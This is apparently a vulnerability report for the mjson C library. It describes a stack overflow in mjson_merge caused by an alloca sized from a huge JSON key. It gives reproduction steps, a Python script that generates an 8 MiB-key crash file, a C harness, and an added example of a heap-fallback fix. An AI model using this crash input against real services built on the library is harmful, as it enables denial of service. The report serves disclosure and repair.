Description
When reading in a larger key, it causes alloca to allocate an incorrect memory address, resulting in a SEGV.
Version

```
commit 696969cd0d35399cc66075f5ec7a96e23ba4a89b (HEAD -> master, origin/master, origin/HEAD)
Author: novlean <novlean@gmail.com>
Date:   Wed Mar 5 18:00:56 2025 +0000

    Update README.md added mongoose
```

Steps to reproduce
```sh
$ git clone https://github.com/cesanta/mjson.git
$ cd mjson
$ python3 poc.py
$ clang -g -O0 harness.c ./src/mjson.c
$ ./harness
```

You can use the following Python script to generate the PoC:
```python
if __name__ == "__main__":
    # Write a JSON object whose single key is 8 MiB of 'A' characters.
    with open("poc.json", "w") as f:
        f.write("{")
        f.write('"{}":1,'.format("A" * 8388608))
        f.write("}")
```

The harness is as follows:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "src/mjson.h"

/* Print callback: forward whatever mjson_merge emits to stdout. */
static int print_to_buffer(const char *buf, int len, void *userdata) {
  (void) userdata;
  write(1, buf, len);
  return len;
}

int main() {
  /* Zero-filled buffer so the input read from poc.json is always NUL-terminated. */
  char *s = calloc(2147483700, 1);
  FILE *f = fopen("./poc.json", "r");
  if (s == NULL || f == NULL) return 1;
  fread(s, 1, 2147483699, f);
  fclose(f);
  const char *s2 = "{\"age\": 31, \"city\": \"New York\"}";
  char buffer[100];
  char *p = buffer;
  int bytes_written = mjson_merge(s, strlen(s), s2, strlen(s2), print_to_buffer, &p);
  (void) bytes_written;
  free(s);
  return 0;
}
```
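The report describes a stack allocation whose size is taken from an input key. The following added example (not mjson's code, and not from the reporter) shows the bounded alternative a maintainer would reach for: keep alloca only for keys below a fixed threshold and move larger keys to the heap, so the 8 MiB key from the PoC is processed instead of faulting. `KEY_STACK_LIMIT`, `with_key_buffer` and `run_large_key_demo` are hypothetical names chosen for this illustration.

```c
#include <alloca.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical threshold: only keys at or below this size may live on the stack. */
#define KEY_STACK_LIMIT 1024

/* Copy an n-byte key into a NUL-terminated scratch buffer and hand it to cb.
 * Small keys use alloca (bounded by KEY_STACK_LIMIT + 1 bytes); larger keys
 * use malloc. Returns cb's result, or -1 if the heap allocation fails. */
static int with_key_buffer(const char *key, size_t n,
                           int (*cb)(const char *k, size_t n, void *ud), void *ud) {
  char *buf;
  int on_heap = n > KEY_STACK_LIMIT;
  if (on_heap) {
    buf = malloc(n + 1);
    if (buf == NULL) return -1;
  } else {
    buf = alloca(n + 1);
  }
  memcpy(buf, key, n);
  buf[n] = '\0';
  int rc = cb(buf, n, ud);
  if (on_heap) free(buf);
  return rc;
}

/* Sample consumer: count the 'A' characters in the key. */
static int count_a(const char *k, size_t n, void *ud) {
  (void) ud;
  int c = 0;
  for (size_t i = 0; i < n; i++) if (k[i] == 'A') c++;
  return c;
}

/* Build a constructed key of keylen 'A' bytes (the PoC used 8388608) and run it
 * through the bounded path. Returns the count of 'A's, i.e. keylen on success. */
int run_large_key_demo(size_t keylen) {
  char *key = malloc(keylen);
  if (key == NULL) return -1;
  memset(key, 'A', keylen);
  int rc = with_key_buffer(key, keylen, count_a, NULL);
  free(key);
  return rc;
}

int main(void) {
  printf("large key processed, rc=%d\n", run_large_key_demo(8388608));
  printf("small key processed, rc=%d\n", run_large_key_demo(16));
  return 0;
}
```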